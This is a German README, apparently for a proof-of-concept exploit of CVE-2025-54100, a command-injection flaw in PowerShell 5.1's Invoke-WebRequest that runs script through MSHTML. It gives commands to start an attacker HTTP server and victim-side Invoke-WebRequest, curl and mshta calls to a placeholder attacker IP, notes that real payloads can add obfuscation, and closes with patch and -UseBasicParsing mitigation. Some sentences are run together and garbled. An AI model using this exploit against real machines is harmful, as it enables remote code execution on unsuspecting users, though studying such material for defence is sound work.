
CVE-2025-54100 (CVSS 7.8 Hoch) ist eine Command Injection-Schwachstelle im Invoke-WebRequest-Cmdlet von Windows PowerShell 5.1. Sie entsteht durch eine unzureichende Neutralisierung spezieller Elemente während der automatischen Analyse von Webantworten.
Ein prägnanter Proof-of-Concept, der zeigt, wie CVE-2025-54100 durch bösartiges HTML-Parsing zu einer Remote-Code-Ausführung (RCE) in Windows PowerShell 5.1 führen kann.
Invoke-WebRequest bei Nicht-Verwendung von -UseBasicParsingActiveXObject) im Kontext des Aufrufers.CVE-2025-54100.py stellt eine präparierte HTML-Nutzlast bereit.WScript.Shell / Shell.Application ActiveX-Objekte zu instanziieren.calc.exe.python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
Starten Sie den PoC-HTTP-Server:
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
Führen Sie diese auf einem anfälligen Windows-Rechner ohne -UseBasicParsing aus:
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888
Verwenden Sie denselben Port, den Sie für den Server konfiguriert haben. Bei Anfälligkeit führt der MSHTML-Parser das eingebettete Skript aus. Einige AV-Produkte können das Verhalten blockieren, auch wenn das Parsing-Problem vorhanden ist.
Falls calc.exe nicht erscheint:
Invoke-WebRequest ohne -UseBasicParsing erneut aus.Dies demonstriert den Ausführungsvektor. Echte Nutzlasten können Verschleierung oder zusätzliche Umgehungen verwenden, um die Standardeinschränkungen zu umgehen.

Microsoft hat das Problem im Dezember 2025 gepatcht:
-UseBasicParsing, um MSHTML-Parsing zu vermeiden:
Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
[!WARNING] Nur für Bildungs- und autorisierte Tests. Verantwortungsvoll nutzen und alle geltenden Gesetze einhalten. Die Autoren haften nicht für Missbrauch oder Schäden.